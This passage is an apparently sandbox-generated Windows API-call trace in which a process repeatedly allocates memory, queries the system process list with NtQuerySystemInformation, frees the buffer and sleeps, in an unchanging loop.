Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0159.856] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0159.857] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0159.869] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0159.869] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0159.870] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0159.870] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0159.870] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0159.872] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0159.873] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0159.886] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0159.887] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0159.888] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0159.888] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0159.888] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0159.891] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0159.892] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0159.902] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0159.902] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0159.902] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0159.903] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0159.903] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0159.904] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0159.905] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0159.916] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0159.916] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0159.917] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0159.917] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0159.917] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0159.918] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0159.919] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0159.932] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0159.932] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0159.932] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0159.933] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0159.933] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0159.936] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0159.936] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0159.947] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0159.947] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0159.948] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0159.948] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0159.948] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0159.950] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0159.950] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0159.963] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0159.963] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0159.963] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0159.964] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0159.964] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0159.967] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0159.968] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0159.978] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0159.978] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0159.979] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0159.979] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0159.979] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0159.981] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0159.982] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0159.996] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0159.996] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0159.997] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0159.997] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0159.998] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0160.000] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0160.001] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0160.009] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0160.010] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0160.010] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0160.010] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0160.010] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0160.012] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0160.012] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0160.025] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0160.026] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0160.026] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0160.026] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0160.027] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0160.030] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0160.031] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0160.041] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0160.048] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0160.048] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0160.049] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0160.049] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0160.051] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0160.052] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0160.056] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0160.057] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0160.057] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0160.057] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0160.057] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0160.060] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0160.060] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0160.072] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0160.073] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0160.081] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0160.082] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0160.082] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0160.084] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0160.085] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0160.087] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0160.087] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0160.088] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0160.088] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0160.088] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0160.090] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0160.090] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0160.125] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0160.126] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0160.126] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0160.126] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0160.127] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0160.128] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0160.129] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0160.134] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0160.135] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0160.135] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0160.135] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0160.135] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0160.137] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0160.137] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0160.150] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0160.150] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0160.151] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0160.151] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0160.151] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0160.153] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0160.154] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0160.165] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0160.166] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0160.166] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0160.166] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0160.166] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0160.168] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0160.169] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0160.181] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0160.182] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0160.182] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0160.183] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0160.183] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0160.186] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0160.186] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0160.197] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0160.197] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0160.197] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0160.197] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0160.197] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0160.199] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0160.200] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0160.212] 